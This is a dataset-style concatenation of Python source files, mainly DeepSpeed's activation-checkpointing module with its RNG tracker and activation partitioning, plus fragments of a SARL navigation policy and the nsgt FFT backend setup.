                                  attention_dims, with_global_state, self.cell_size, self.cell_num)
        self.multiagent_training = config.getboolean('sarl', 'multiagent_training')
        if self.with_om:
            # Occupancy-map variant: same network, richer per-human input.
            self.name = 'OM-SARL'
        logging.info('Policy: {} {} global state'.format(self.name, 'w/' if with_global_state else 'w/o'))
    def get_attention_weights(self):
        # Attention weights of the first sample from the last forward pass.
        return self.model.attention_weights
c5c4a1cd9ba151e4a55911dda45d547931eb2e8e | 32,886 | py | Python | deepspeed/runtime/activation_checkpointing/checkpointing.py | Quentin-Anthony/DeeperSpeed | eb7f5cff36678625d23db8a8fe78b4a93e5d2c75 | [
"MIT"
] | 58 | 2021-01-24T08:57:03.000Z | 2022-03-31T07:47:13.000Z | deepspeed/runtime/activation_checkpointing/checkpointing.py | Quentin-Anthony/DeeperSpeed | eb7f5cff36678625d23db8a8fe78b4a93e5d2c75 | [
"MIT"
] | 1 | 2020-12-11T21:08:42.000Z | 2020-12-11T21:08:42.000Z | deepspeed/runtime/activation_checkpointing/checkpointing.py | Quentin-Anthony/DeeperSpeed | eb7f5cff36678625d23db8a8fe78b4a93e5d2c75 | [
"MIT"
] | 14 | 2021-01-25T03:48:44.000Z | 2022-03-18T12:58:14.000Z | '''
Copyright (c) Microsoft Corporation
Licensed under the MIT license.
Use to partition the activations stored for backward propagation
Therefore reduces the memory consumption
Also implements CPU checkpointing and contiguous memory checkpointing
Reduces memory consumption and memory fragmentation
Code for rng checkpointing taken from NVIDIA Megatron-LM mpu/random.py
b886b7bb972afe72bac0f5de4f42a4a7bae8ebef
'''
# Parts of the code here are adapted from PyTorch
# repo: https://github.com/pytorch/pytorch
import copy
import torch
import contextlib
import torch.distributed as dist
import mmap
from torch import _C
from torch.cuda import _lazy_call, device as device_ctx_manager
from deepspeed.runtime.config import DeepSpeedConfig
from deepspeed.utils import logger
from deepspeed.runtime.utils import move_to_device, see_memory_usage
from deepspeed.utils.timer import SynchronizedWallClockTimer as Timers
# DeepSpeed Checkpointing Enabled or Disabled
deepspeed_checkpointing_enabled = False
# MP parameters
mpu = None
mp_rank = None
mp_size = None
mp_group = None
# Model Parameters
num_layers = None
# Checkpointing buffers
contiguous_data_buffers = []
data_offsets = []
contiguous_size_buffers = []
size_offsets = []
timers = None
# optimization flags
PARTITION_ACTIVATIONS = False
PA_TO_CPU = False
CONTIGUOUS_CHECKPOINTING = False
SYNCHRONIZE = False
PROFILE_TIME = False
# Default name for the model parallel rng tracker.
_MODEL_PARALLEL_RNG_TRACKER_NAME = 'model-parallel-rng'
transport_stream = None
cuda_device = None
def detach_variable(inputs, device=None):
    """Return a tuple mirroring *inputs* where every tensor is detached.

    Non-tensor entries are passed through untouched. Each tensor is optionally
    moved to *device*, detached from the autograd graph, and has its original
    requires_grad flag restored on the detached copy. Raises RuntimeError for
    any non-tuple input.
    """
    if not isinstance(inputs, tuple):
        raise RuntimeError(
            "Only tuple of tensors is supported. Got Unsupported input type: ",
            type(inputs).__name__)
    detached = []
    for entry in inputs:
        if not isinstance(entry, torch.Tensor):
            detached.append(entry)
            continue
        needs_grad = entry.requires_grad
        tensor = entry.to(device=device) if device is not None else entry
        tensor = tensor.detach()
        tensor.requires_grad = needs_grad
        detached.append(tensor)
    return tuple(detached)
def _set_cuda_rng_state(new_state, device=-1):
    """Sets the random number generator state of the current GPU.
    Arguments:
        new_state (torch.ByteTensor): The desired state
    This function is adapted from PyTorch repo (torch.cuda.set_rng_state)
    with a single change: the input state is not cloned. Cloning caused
    major performance issues for +4 GPU cases.
    """
    if hasattr(_C, '_cuda_setRNGState') and callable(_C._cuda_setRNGState):
        # older PyTorch
        def cb():
            with device_ctx_manager(device):
                _C._cuda_setRNGState(new_state)
    else:
        # newer PyTorch
        # Normalize the device argument: -1 means "current cuda device".
        if device == -1:
            device = torch.device('cuda')
        elif isinstance(device, str):
            device = torch.device(device)
        elif isinstance(device, int):
            device = torch.device('cuda', device)
        def cb():
            idx = device.index
            if idx is None:
                idx = torch.cuda.current_device()
            default_generator = torch.cuda.default_generators[idx]
            default_generator.set_state(new_state)
    # _lazy_call defers cb until CUDA has been initialized.
    _lazy_call(cb)
class CudaRNGStatesTracker:
    """Tracker for the cuda RNG states.

    Using the `add` method, a cuda rng state is initialized based on
    the input `seed` and is assigned to `name`. Later, by forking the
    rng state, we can perform operations and return to our starting
    cuda state.
    """

    def __init__(self):
        # name -> saved cuda rng state
        self.states_ = {}
        # seeds already handed out, to guard against accidental reuse
        self.seeds_ = set()

    def reset(self):
        """Set to the initial state (no tracker)."""
        self.states_ = {}
        self.seeds_ = set()

    def get_states(self):
        """Return a shallow copy of the name -> state mapping."""
        return copy.copy(self.states_)

    def set_states(self, states):
        """Replace the tracked states wholesale (no size/compat checks)."""
        self.states_ = states

    def add(self, name, seed):
        """Seed and record a new named cuda rng state."""
        if seed in self.seeds_:
            raise Exception('seed {} already exists'.format(seed))
        self.seeds_.add(seed)
        if name in self.states_:
            raise Exception('cuda rng state {} already exists'.format(name))
        # Seed the generator, capture the resulting state under `name`,
        # then restore whatever state was active before.
        original_state = torch.cuda.get_rng_state()
        torch.cuda.manual_seed(seed)
        self.states_[name] = torch.cuda.get_rng_state()
        _set_cuda_rng_state(original_state)

    @contextlib.contextmanager
    def fork(self, name=_MODEL_PARALLEL_RNG_TRACKER_NAME):
        """Fork the cuda rng state, run the body, then restore the original."""
        if name not in self.states_:
            raise Exception('cuda rng state {} is not added'.format(name))
        original_state = torch.cuda.get_rng_state()
        _set_cuda_rng_state(self.states_[name])
        try:
            yield
        finally:
            # Persist where the named stream ended up, then switch back.
            self.states_[name] = torch.cuda.get_rng_state()
            _set_cuda_rng_state(original_state)
# RNG tracker object.
_CUDA_RNG_STATE_TRACKER = CudaRNGStatesTracker()
def get_cuda_rng_tracker():
    """Get cuda rng tracker."""
    # Returns the module-level singleton shared by all checkpointed layers.
    return _CUDA_RNG_STATE_TRACKER
def model_parallel_cuda_manual_seed(seed):
    """Initialize model parallel cuda seed.
    This function should be called after the model parallel is
    initialized. Also, no torch.cuda.manual_seed should be called
    after this function. Basically, this is replacement for that
    function.
    Two set of RNG states are tracked:
    default state: This is for data parallelism and is the same among a
                   set of model parallel GPUs but different across
                   different model paralle groups. This is used for
                   example for dropout in the non-model-parallel regions.
    model-parallel state: This state is different among a set of model
                          parallel GPUs, but the same across data parallel
                          groups. This is used for example for dropout in
                          model parallel regions.
    """
    global mpu
    # 2718 is just for fun and any POSITIVE value will work.
    offset = seed + 2718
    model_parallel_seed = offset + mpu.get_model_parallel_rank()
    # Data parallel gets the original seed.
    data_parallel_seed = seed
    if torch.distributed.get_rank() == 0:
        logger.info(
            '> initializing model parallel cuda seeds on global rank {}, '
            'model parallel rank {}, and data parallel rank {} with '
            'model parallel seed: {} and data parallel seed: {}'.format(
                torch.distributed.get_rank(),
                mpu.get_model_parallel_rank(),
                mpu.get_data_parallel_rank(),
                model_parallel_seed,
                data_parallel_seed),
        )
    _CUDA_RNG_STATE_TRACKER.reset()
    # Set the default state.
    torch.cuda.manual_seed(data_parallel_seed)
    # and model parallel state.
    _CUDA_RNG_STATE_TRACKER.add(_MODEL_PARALLEL_RNG_TRACKER_NAME, model_parallel_seed)
def get_partition_start(item):
    """Return the flat start index of this model-parallel rank's slice of *item*."""
    global mp_rank, mp_size, mp_group
    size = item.numel()
    partition_size = size / mp_size
    start = partition_size * mp_rank
    return int(start)
def get_partition_size(item):
    """Return the number of elements in each model-parallel partition of *item*."""
    global mp_rank, mp_size, mp_group
    size = item.numel()
    assert size % mp_size == 0, "Doesn't handle if partition activation if item is not divisible by mp size"
    partition_size = size / mp_size
    return int(partition_size)
def get_full_inputs(tensors, device=None, fp32_comm=False):
    """Reassemble full activation tensors from per-rank partitions.

    *tensors* alternates (partition, original-size) pairs as saved by the
    checkpoint forward pass; the final pair is passed through as-is. Each
    partition is all-gathered across the model-parallel group and each item's
    .data is replaced in place with the reconstructed full tensor.
    fp32_comm upcasts partitions to float32 for the all_gather and casts back.
    """
    inputs = []
    num_args = int(len(tensors) / 2)
    for i in range(num_args - 1):
        item = tensors[2 * i]
        size = tensors[2 * i + 1]
        partition_size = item.numel()
        tensor_size = partition_size * mp_size
        if device is not None:
            flat_tensor = torch.zeros([tensor_size], dtype=item.dtype, device=device)
        else:
            flat_tensor = torch.zeros([tensor_size],
                                      dtype=item.dtype,
                                      device=item.device)
        partitions = []
        # NOTE(review): this inner loop reuses `i`, shadowing the outer loop
        # variable; it works because `i` is re-assigned by the outer range on
        # the next iteration, but it is fragile.
        for i in range(mp_size):
            part_i = flat_tensor.narrow(0, partition_size * i, partition_size)
            if i == mp_rank:
                part_i.copy_(item)
            if fp32_comm:
                part_i = part_i.float()
            partitions.append(part_i)
        if mp_group is not None:
            dist.all_gather(partitions, partitions[mp_rank], group=mp_group)
        if fp32_comm:
            for i in range(mp_size):
                partitions[i] = partitions[i].to(item.dtype)
        # Reshape the gathered flat buffer back to the recorded size and
        # splice it into the saved tensor in place.
        input_tensor = flat_tensor.view(list(size.numpy()))
        item.data = input_tensor.data
        inputs.append(item)
    inputs.append(tensors[-2])
    return tuple(inputs)
def extract_tensors(all_objects):
    """
    Separate objects in list/tuple into tensors and non-tensors and create a mapping to enable re-aggregation.
    The order of tensors and non-tensors is preserved in their respective output groups.
    Parameters:
        all_objects (list/tuple): Objects containing tensors and non-tensors to be split.
    Returns:
        tuple: Containing tensors, non-tensors, and bools of whether each position in original list/tuple was a tensor.
    """
    tensor_flags = [torch.is_tensor(obj) for obj in all_objects]
    tensor_objects = [obj for obj, is_tensor in zip(all_objects, tensor_flags) if is_tensor]
    non_tensor_objects = [obj for obj, is_tensor in zip(all_objects, tensor_flags) if not is_tensor]
    # Mirror the container kind of the input (exact tuple only, on purpose).
    if type(all_objects) is tuple:
        return tuple(tensor_objects), tuple(non_tensor_objects), tuple(tensor_flags)
    return tensor_objects, non_tensor_objects, tensor_flags
def merge_tensors(tensor_objects, non_tensor_objects, tensor_flags):
    """
    Merge two lists (or tuples) of tensors and non-tensors using a mapping of positions in merged list (or tuple).
    Parameters:
        tensor_objects (list/tuple): Tensors to merge.
        non_tensor_objects (list/tuple): Non-tensors to merge.
        tensor_flags (list/tuple): Indicates whether each position in output is a tensor.
    Returns:
        tuple: Merge of tensors and non-tensors
    """
    # When activations are partitioned, every tensor flag is followed by a
    # flag for that tensor's flattened-size entry; drop those trailing flags.
    if PARTITION_ACTIVATIONS:
        effective_flags = []
        skip_next = False
        for flag in tensor_flags:
            if skip_next:
                skip_next = False
                continue
            skip_next = flag
            effective_flags.append(flag)
    else:
        effective_flags = tensor_flags
    merged = []
    tensor_idx = 0
    non_tensor_idx = 0
    for is_tensor in effective_flags:
        if is_tensor:
            merged.append(tensor_objects[tensor_idx])
            tensor_idx += 1
        else:
            merged.append(non_tensor_objects[non_tensor_idx])
            non_tensor_idx += 1
    return tuple(merged)
class CheckpointFunction(torch.autograd.Function):
    """This function is adapted from torch.utils.checkpoint with
    the following changes:
        1) torch.cuda.set_rng_state is replaced with `_set_cuda_rng_state`
        2) the states in the model parallel tracker are also properly
           tracked/set/reset.
        3) Performance activation partitioning, contiguous memory optimization
        4) CPU Checkpointing
        5) Profile forward and backward functions
    """
    @staticmethod
    def forward(ctx, run_function, all_outputs, *args):
        global mpu, timers, SYNCHRONIZE, PROFILE_TIME

        def save_args_for_backward(*all_args):
            # Tensors go through save_for_backward (so autograd manages their
            # lifetime); non-tensors are stashed directly on ctx.
            tensor_args, non_tensor_args, tensor_flags = extract_tensors(all_objects=all_args)
            ctx.save_for_backward(*tensor_args)
            ctx.non_tensor_args = non_tensor_args
            ctx.tensor_flags = tensor_flags

        if SYNCHRONIZE:
            torch.cuda.synchronize()

        if timers is None and PROFILE_TIME:
            timers = Timers()

        if PROFILE_TIME:
            timers('forward').start()

        ctx.run_function = run_function
        global num_layers
        global mp_rank, mp_size, mp_group
        global contiguous_data_buffers, contiguous_size_buffers
        global data_offsets, size_offsets
        if mp_rank is None:
            # Lazily discover the model-parallel topology on first use.
            if mpu is not None:
                mp_rank = mpu.get_model_parallel_rank()
                mp_size = mpu.get_model_parallel_world_size()
                mp_group = mpu.get_model_parallel_group()
            else:
                mp_rank = 0
                mp_size = 1
                mp_group = None

        global cuda_device, transport_stream, PARTITION_ACTIVATIONS, buffer_0, buffer_1, buffer_0_offset, buffer_1_offset

        if cuda_device is None:
            # One-time setup: log the active configuration and create the
            # side stream used for activation transport.
            see_memory_usage("First Forward Begining", force=False)
            if dist.get_rank() == 0:
                logger.info(f"Activation Checkpointing Information")
                logger.info(
                    f"----Partition Activations {PARTITION_ACTIVATIONS}, CPU CHECKPOINTING {PA_TO_CPU}"
                )
                logger.info(
                    f"----contiguous Memory Checkpointing {CONTIGUOUS_CHECKPOINTING} with {num_layers} total layers"
                )
                logger.info(f"----Synchronization {SYNCHRONIZE}")
                logger.info(f"----Profiling {PROFILE_TIME}")

            cuda_device = torch.cuda.current_device()
            transport_stream = torch.cuda.Stream(device=cuda_device)

        if PARTITION_ACTIVATIONS:
            #inputs = [item.detach().contiguous().view(-1).narrow(0, get_partition_start(item), get_partition_size(item)).clone() for item in args[:-1]]
            # inputs.append(args[-1])

            # Keep only this rank's slice of each input tensor; slices are
            # optionally packed into contiguous buffers and/or moved to CPU.
            inputs = []
            for i, item in enumerate(args[:-1]):
                if not torch.is_tensor(item):
                    inputs.append(item)
                    continue

                partition_size = get_partition_size(item)
                partition = item.detach().contiguous().view(-1).narrow(
                    0,
                    get_partition_start(item),
                    partition_size).clone()

                if CONTIGUOUS_CHECKPOINTING:
                    buffer_device = torch.device(
                        'cpu') if PA_TO_CPU else partition.device

                    if i >= len(contiguous_data_buffers):
                        # First time we see input position i: allocate one
                        # buffer per checkpointed layer.
                        tensor_list = [
                            torch.tensor(()).new_empty([partition_size],
                                                       dtype=partition.dtype,
                                                       device=buffer_device)
                            for i in range(num_layers)
                        ]
                        contiguous_data_buffers.append(tensor_list)
                        data_offsets.append(0)
                    elif contiguous_data_buffers[i] is None:
                        tensor_list = [
                            torch.tensor(()).new_empty([partition_size],
                                                       dtype=partition.dtype,
                                                       device=buffer_device)
                            for i in range(num_layers)
                        ]
                        contiguous_data_buffers[i] = tensor_list
                        data_offsets[i] = 0

                    # Because the 'new_empty' returns uninitialized pages,
                    # the pages need to be populated during the cudaMemcpy time
                    # which increases the data copy time. To avoid this, we
                    # pre-populate these pages by simply writing 0 ahead of
                    # the actual cudaMemcpy operation time. Due to the
                    # previously launched GPU kernels, there is a small
                    # window of time here for CPUs to populate pages asynchronously.
                    contiguous_data_buffers[i][data_offsets[i]].data[range(
                        0,
                        contiguous_data_buffers[i][data_offsets[i]].data.shape[0],
                        int(mmap.PAGESIZE / contiguous_data_buffers[i][
                            data_offsets[i]].data.element_size()))] = 0

                    contiguous_partition = contiguous_data_buffers[i][
                        data_offsets[i]].data.copy_(partition.data)
                    data_offsets[i] = data_offsets[i] + 1
                    inputs.append(contiguous_partition)
                else:
                    partition = partition.cpu() if PA_TO_CPU else partition
                    inputs.append(partition)

            inputs.append(args[-1])

        #just in case something funky is happening such as reuse of inputs
        # NOTE(review): the forward pass runs on the full (unpartitioned)
        # args; the partitioned `inputs` are only used below for what gets
        # saved for backward.
        inputs_cuda = move_to_device(args, cuda_device)

        # Copy the rng states.
        ctx.fwd_cpu_rng_state = torch.get_rng_state()
        ctx.fwd_cuda_rng_state = torch.cuda.get_rng_state()
        ctx.fwd_cuda_rng_state_tracker = get_cuda_rng_tracker().get_states()

        see_memory_usage("Before running forward on the layer", force=False)
        # ctx.save_for_backward(*args)
        with torch.no_grad():
            outputs = run_function(*inputs_cuda)

        see_memory_usage("After running forward on the layer", force=False)
        del inputs_cuda

        # with torch.cuda.stream(transport_stream):
        # if PARTITION_ACTIVATIONS:
        #     new_args = []
        #     for arg, inp in zip(args,inputs):
        #         size= torch.tensor(arg.size())
        #         arg.data = inp.data
        #         new_args.append(arg)
        #         new_args.append(size)
        #     ctx.save_for_backward(*new_args)

        if PARTITION_ACTIVATIONS:
            # Replace each tensor arg's storage with its partitioned slice and
            # save the original size alongside it so backward can reconstruct
            # the full tensor.
            new_args = []
            for i, (arg, inp) in enumerate(zip(args, inputs)):
                if not torch.is_tensor(arg):
                    new_args.append(arg)
                    continue

                size = torch.tensor(arg.size())

                arg.data = inp.data
                new_args.append(arg)

                if CONTIGUOUS_CHECKPOINTING:
                    numel = size.numel()
                    if i >= len(contiguous_size_buffers):
                        tmp = torch.tensor(())
                        contiguous_size_buffers.append(
                            tmp.new_empty([numel * num_layers],
                                          dtype=size.dtype,
                                          device=size.device))
                        size_offsets.append(0)
                    elif contiguous_size_buffers[i] is None:
                        tmp = torch.tensor(())
                        contiguous_size_buffers[i] = tmp.new_empty([numel * num_layers],
                                                                   dtype=size.dtype,
                                                                   device=size.device)
                        size_offsets[i] = 0

                    contiguous_size = contiguous_size_buffers[i].narrow(
                        0,
                        size_offsets[i],
                        numel).data.copy_(size.data)
                    contiguous_size = contiguous_size.view_as(size)
                    size_offsets[i] = size_offsets[i] + numel
                    new_args.append(contiguous_size)
                else:
                    new_args.append(size)
                # if dist.get_rank() == 0:
                #     logger.info(f"The stored tensor is {contiguous_size} and orginal one is {size} ")

            save_args_for_backward(*new_args)
        else:
            save_args_for_backward(*args)

        if PROFILE_TIME:
            timers('forward').stop()
            timers.log(['forward'])
        if SYNCHRONIZE:
            torch.cuda.synchronize()

        # Tensors returned from forward() may not be differentiable.
        if torch.is_tensor(outputs):
            non_grad_outputs = [outputs] if not outputs.is_floating_point() else []
        else:
            non_grad_outputs = [
                o for o in outputs if torch.is_tensor(o) and not o.is_floating_point()
            ]
        ctx.mark_non_differentiable(*non_grad_outputs)

        if torch.is_tensor(outputs):
            all_outputs += [outputs]
            return outputs
        else:
            all_outputs += outputs
            outputs, _, _ = extract_tensors(all_objects=outputs)
            return tuple(outputs)

    @staticmethod
    def backward(ctx, *grads):
        global timers
        see_memory_usage("In backward", force=False)
        # removing pointers to the contiguous buffer memory
        # so that they can be garbage collected once the checkpoints
        # have been used
        if SYNCHRONIZE:
            torch.cuda.synchronize()
        if PROFILE_TIME:
            timers('backward').start()

        if CONTIGUOUS_CHECKPOINTING:
            global data_offsets, size_offsets
            global contiguous_data_buffers, contiguous_size_buffers

            # NOTE(review): this loop only rebinds the loop variable and does
            # not clear anything; the buffers are actually released by the
            # list reassignments below -- confirm per-buffer clearing was not
            # intended here.
            for buffers in contiguous_data_buffers:
                buffers = []

            # frees up all the pointers to the checkpoints except for the ones
            # stored by save for backward
            contiguous_data_buffers = []
            contiguous_size_buffers = []
            data_offsets = []
            size_offsets = []

        see_memory_usage("In backward checkpointing code", force=False)
        if not torch.autograd._is_checkpoint_valid():
            raise RuntimeError("Checkpointing is not compatible with .grad(), "
                               "please use .backward() if possible")

        global cuda_device, transport_stream, PARTITION_ACTIVATIONS

        if PARTITION_ACTIVATIONS:
            # NOTE(review): fp32_comm is passed to get_full_inputs when the
            # saved checkpoints are bfloat16 -- presumably to gather in fp32;
            # confirm against get_full_inputs.
            if ctx.saved_tensors and ctx.saved_tensors[0].dtype == torch.bfloat16:
                FP32_COMM = True
            else:
                FP32_COMM = False
            # with torch.cuda.stream(transport_stream):
            inputs = get_full_inputs(ctx.saved_tensors,
                                     device=cuda_device if PA_TO_CPU else None,
                                     fp32_comm=FP32_COMM)
            detached_inputs = detach_variable(inputs)
        else:
            inputs = ctx.saved_tensors
            detached_inputs = detach_variable(inputs)

        # Add non tensor input args
        detached_inputs = merge_tensors(tensor_objects=detached_inputs,
                                        non_tensor_objects=ctx.non_tensor_args,
                                        tensor_flags=ctx.tensor_flags)

        # Store the current states.
        bwd_cpu_rng_state = torch.get_rng_state()
        bwd_cuda_rng_state = torch.cuda.get_rng_state()
        bwd_cuda_rng_state_tracker = get_cuda_rng_tracker().get_states()

        # Set the states to what it used to be before the forward pass.
        torch.set_rng_state(ctx.fwd_cpu_rng_state)
        _set_cuda_rng_state(ctx.fwd_cuda_rng_state)
        get_cuda_rng_tracker().set_states(ctx.fwd_cuda_rng_state_tracker)

        # if PARTITION_ACTIVATIONS:
        #     current_stream=torch.cuda.current_stream()
        #     current_stream.wait_stream(transport_stream)

        see_memory_usage("In backward checkpointing code before forward", force=False)
        with torch.enable_grad():
            # Re-run the forward pass under the restored RNG state to
            # recompute the activations that were not stored.
            outputs = ctx.run_function(*detached_inputs)

        see_memory_usage("In backward checkpointing code after forward", force=False)
        # Set the states back to what it was at the start of this function.
        torch.set_rng_state(bwd_cpu_rng_state)
        _set_cuda_rng_state(bwd_cuda_rng_state)
        get_cuda_rng_tracker().set_states(bwd_cuda_rng_state_tracker)

        if isinstance(outputs, torch.Tensor):
            outputs = (outputs, )

        # Filter out non tensor outputs
        outputs, _, _ = extract_tensors(all_objects=outputs)

        # Construct arguments to autograd.backward().
        # This is usually just outputs and grads, but forward() can return tensors that
        # are not differentiable.
        output_tensors = []
        grad_tensors = []
        for out, grad in zip(outputs, grads):
            if out.requires_grad:
                output_tensors.append(out)
                grad_tensors.append(grad)

        see_memory_usage("In backward checkpointing code before backward", force=False)
        torch.autograd.backward(output_tensors, grad_tensors)
        see_memory_usage("After backward checkpointing code after backward", force=False)

        if PROFILE_TIME:
            timers('backward').stop()
            timers.log(['backward'])
        if SYNCHRONIZE:
            torch.cuda.synchronize()
        ret_list = [None, None]  # first None for ctx
        for inp in detached_inputs:
            if torch.is_tensor(inp):
                ret_list.append(inp.grad)
            else:
                ret_list.append(None)

        return tuple(ret_list)
def checkpoint(function, *args):
    """Checkpoint a model or part of the model.

    This has been directly copied from torch.utils.checkpoint."""
    all_outputs = []
    CheckpointFunction.apply(function, all_outputs, *args)
    return all_outputs[0] if len(all_outputs) == 1 else tuple(all_outputs)
def partition_activations_in_checkpoint(partition_activation):
    """Globally enable/disable partitioning of activation checkpoints across
    model-parallel GPUs, logging the new setting on rank 0."""
    global PARTITION_ACTIVATIONS
    PARTITION_ACTIVATIONS = partition_activation
    is_rank_zero = dist.get_rank() == 0
    if is_rank_zero:
        logger.info(
            f"**************Partition Activations {PARTITION_ACTIVATIONS}************")
def set_num_layers(nlayers):
    """Set the global number of checkpointed layers (used to size the
    contiguous checkpoint buffers)."""
    global num_layers
    num_layers = nlayers
def reset():
    """Resets memory buffers related to contiguous memory optimizations.
    Should be called during eval when multiple forward propagations are
    computed without any backward propagation that usually clears these
    buffers.
    Arguments:
        None

    Return:
        None
    """
    if CONTIGUOUS_CHECKPOINTING:
        global data_offsets, size_offsets
        global contiguous_data_buffers, contiguous_size_buffers

        # Rebinding the module-level lists releases all references to the
        # checkpoint buffers (except those still held by save_for_backward),
        # allowing them to be garbage collected.
        # Bug fix: the previous ``for buffers in contiguous_data_buffers:
        # buffers = []`` loop only rebound the loop variable and had no
        # effect, so it was removed.
        contiguous_data_buffers = []
        contiguous_size_buffers = []
        data_offsets = []
        size_offsets = []
def _configure_using_config_file(deepspeed_config, mpu=None):
    """Load activation-checkpointing settings from a DeepSpeed config file
    into the module-level flags, logging the parsed config on rank 0."""
    global num_layers, PARTITION_ACTIVATIONS, CONTIGUOUS_CHECKPOINTING, \
        PA_TO_CPU, SYNCHRONIZE, PROFILE_TIME

    config = DeepSpeedConfig(deepspeed_config, mpu=mpu).activation_checkpointing_config
    if dist.get_rank() == 0:
        logger.info(config.repr())

    # Mirror each config field into the corresponding module-level global.
    PARTITION_ACTIVATIONS = config.partition_activations
    CONTIGUOUS_CHECKPOINTING = config.contiguous_memory_optimization
    num_layers = config.number_checkpoints
    PA_TO_CPU = config.cpu_checkpointing
    SYNCHRONIZE = config.synchronize_checkpoint_boundary
    PROFILE_TIME = config.profile
def _configure_defaults():
global mpu, num_layers, deepspeed_checkpointing_enabled
global PARTITION_ACTIVATIONS, CONTIGUOUS_CHECKPOINTING, \
PA_TO_CPU, SYNCHRONIZE, PROFILE_TIME
PARTITION_ACTIVATIONS = False
CONTIGUOUS_CHECKPOINTING = False
num_layers = False
PA_TO_CPU = False
SYNCHRONIZE = False
PROFILE_TIME = False
deepspeed_checkpointing_enabled = True
def configure(
    mpu_,
    deepspeed_config=None,
    partition_activations=None,
    contiguous_checkpointing=None,
    num_checkpoints=None,
    checkpoint_in_cpu=None,
    synchronize=None,
    profile=None,
):
    """Configure DeepSpeed Activation Checkpointing.

    Arguments:
        mpu_: Optional: An object that implements the following methods
            get_model_parallel_rank/group/world_size, and get_data_parallel_rank/group/world_size

        deepspeed_config: Optional: DeepSpeed Config json file when provided will be used to
            configure DeepSpeed Activation Checkpointing

        partition_activations: Optional: Partitions activation checkpoint across model parallel
            GPUs when enabled. By default False. Will overwrite deepspeed_config if provided

        contiguous_checkpointing: Optional: Copies activation checkpoints to a contiguous memory
            buffer. Works only with homogeneous checkpoints when partition_activations is enabled.
            Must provide num_checkpoints. By default False. Will overwrite deepspeed_config if
            provided

        num_checkpoints: Optional: Number of activation checkpoints stored during the forward
            propagation of the model. Used to calculate the buffer size for contiguous_checkpointing
            Will overwrite deepspeed_config if provided

        checkpoint_in_cpu: Optional: Moves the activation checkpoint to CPU. Only works with
            partition_activation. Default is false. Will overwrite deepspeed_config if provided

        synchronize: Optional: Performs torch.cuda.synchronize() at the beginning and end of
            each call to deepspeed.checkpointing.checkpoint for both forward and backward pass.
            By default false. Will overwrite deepspeed_config if provided

        profile: Optional: Logs the forward and backward time for each
            deepspeed.checkpointing.checkpoint invocation. Will overwrite deepspeed_config
            if provided

    Returns:
        None
    """
    global mpu, num_layers, deepspeed_checkpointing_enabled

    global PARTITION_ACTIVATIONS, CONTIGUOUS_CHECKPOINTING, \
        PA_TO_CPU, SYNCHRONIZE, PROFILE_TIME

    # Precedence: defaults first, then the config file, then explicit
    # keyword arguments (highest).
    _configure_defaults()

    if mpu_ is not None:
        mpu = mpu_

    if deepspeed_config is not None:
        _configure_using_config_file(deepspeed_config, mpu=mpu)

    if partition_activations is not None:
        PARTITION_ACTIVATIONS = partition_activations

    if contiguous_checkpointing is not None:
        CONTIGUOUS_CHECKPOINTING = contiguous_checkpointing

    if num_checkpoints is not None:
        num_layers = num_checkpoints

    if checkpoint_in_cpu is not None:
        PA_TO_CPU = checkpoint_in_cpu

    if synchronize is not None:
        SYNCHRONIZE = synchronize

    if profile is not None:
        PROFILE_TIME = profile

    # Sanity checks: both optimizations build on partitioned activations.
    if PA_TO_CPU or CONTIGUOUS_CHECKPOINTING:
        assert PARTITION_ACTIVATIONS, "CPU Checkpointing/Contiguous Checkpointing is only availble with partitioned activations. Set partitioned activations to true in deepspeed config"
    if CONTIGUOUS_CHECKPOINTING:
        assert num_layers is not None, "Must specify the number of layers with contiguous memory checkpointing"
def is_configured():
    """True if deepspeed activation checkpointing has been configured
    by calling deepspeed.checkpointing.configure, else returns false

    Arguments:
        None

    Return:
        True if configured, else False
    """
    return deepspeed_checkpointing_enabled
| 38.150812 | 186 | 0.609895 |
41c89cd6020efea7a5a86717aeaeec36d687cc43 | 5,156 | py | Python | nsgt/fft.py | smallnamespace/nsgt | 48b1c695d7c0e1f5ab93d1907583725fc8160a8e | [
"Artistic-2.0"
] | 2 | 2021-05-11T20:50:29.000Z | 2021-05-12T00:56:08.000Z | nsgt/fft.py | smallnamespace/nsgt | 48b1c695d7c0e1f5ab93d1907583725fc8160a8e | [
"Artistic-2.0"
] | null | null | null | nsgt/fft.py | smallnamespace/nsgt | 48b1c695d7c0e1f5ab93d1907583725fc8160a8e | [
"Artistic-2.0"
] | null | null | null | # -*- coding: utf-8
"""
Python implementation of Non-Stationary Gabor Transform (NSGT)
derived from MATLAB code by NUHAG, University of Vienna, Austria
Thomas Grill, 2011-2015
http://grrrr.org/nsgt
Austrian Research Institute for Artificial Intelligence (OFAI)
AudioMiner project, supported by Vienna Science and Technology Fund (WWTF)
"""
import numpy as np
from warnings import warn
# Select an FFT backend: prefer the fftw3 bindings when importable,
# otherwise fall back to numpy.fft (handled in the block below).
realized = False

if not realized:
    # try to use FFT3 if available, else use numpy.fftpack
    try:
        import fftw3
    except ImportError:
        fftw3 = None
    try:
        import fftw3f
    except ImportError:
        fftw3f = None

    if fftw3 is not None:
        # fftw3 methods
        class fftpool:
            # Cache of FFTW plans keyed by input length. Subclasses implement
            # init() returning a (plan, pre, post) triple for a given length;
            # __call__ reuses the cached plan for repeated transforms.
            def __init__(self, measure, dtype=float):
                self.measure = measure
                self.dtype = np.dtype(dtype)
                dtsz = self.dtype.itemsize
                # Pick single- or double-precision FFTW bindings by item size.
                if dtsz == 4:
                    self.tpfloat = np.float32
                    self.tpcplx = np.complex64
                    self.fftw = fftw3f
                elif dtsz == 8:
                    self.tpfloat = np.float64
                    self.tpcplx = np.complex128
                    self.fftw = fftw3
                else:
                    raise TypeError("nsgt.fftpool: dtype '%s' not supported"%repr(self.dtype))
                self.pool = {}

            def __call__(self, x, outn=None, ref=False):
                lx = len(x)
                try:
                    transform = self.pool[lx]
                except KeyError:
                    # NOTE(review): plans are cached by input length only, so
                    # `outn` is honored only on the first call for a given
                    # length -- confirm callers pass a consistent outn per lx.
                    transform = self.init(lx, measure=self.measure, outn=outn)
                    self.pool[lx] = transform
                plan,pre,post = transform
                if pre is not None:
                    x = pre(x)
                plan.inarray[:] = x
                plan()
                # ref=True returns the plan's internal output array (no copy);
                # it will be overwritten by the next transform of this length.
                if not ref:
                    tx = plan.outarray.copy()
                else:
                    tx = plan.outarray
                if post is not None:
                    tx = post(tx)
                return tx

        class fftp(fftpool):
            # Forward complex-to-complex FFT (fftw3 backend).
            def __init__(self, measure=False, dtype=float):
                fftpool.__init__(self, measure, dtype=dtype)
            def init(self, n, measure, outn):
                inp = self.fftw.create_aligned_array(n, dtype=self.tpcplx)
